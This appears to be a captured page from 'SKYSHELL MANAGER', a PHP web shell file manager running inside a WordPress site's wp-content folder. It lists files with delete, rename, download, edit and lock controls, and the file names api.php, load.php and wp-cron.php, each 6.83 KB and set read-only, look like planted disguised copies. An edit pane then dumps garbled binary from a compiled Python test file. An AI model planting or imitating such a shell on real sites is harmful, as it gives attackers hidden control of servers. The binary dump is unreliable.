📁
SKYSHELL MANAGER
PHP v8.3.6
Create
Create
Path:
root
/
var
/
www
/
voigtlaborg
/
wp-content
/
Name
Size
Perm
Actions
📁
themes
-
0755
🗑️
🏷️
🔒
📄
api.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
goods.php
173.77 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
load.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-cron.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: test_coroutine_cached_property.cpython-312.pyc
� �Y�_� � �b � d Z ddlZddlZddlmZ ddlZd� Zd� Z G d� dej � Z y)z� The same tests as in :mod:`.test_async_cached_property`, but with the old yield from instead of the new async/await syntax. Used to test Python 3.4 compatibility which has asyncio but doesn't have async/await yet. � N)�freeze_timec � � � � fd�}|S )Nc � �� t j �� } || i |��}t j � }|j |� y �N)�asyncio� coroutine�get_event_loop�run_until_complete)�args�kwargs�coro�future�loop�fs ��J/usr/share/python3-cached-property/tests/test_coroutine_cached_property.py�wrapperz"unittest_run_loop.<locals>.wrapper s>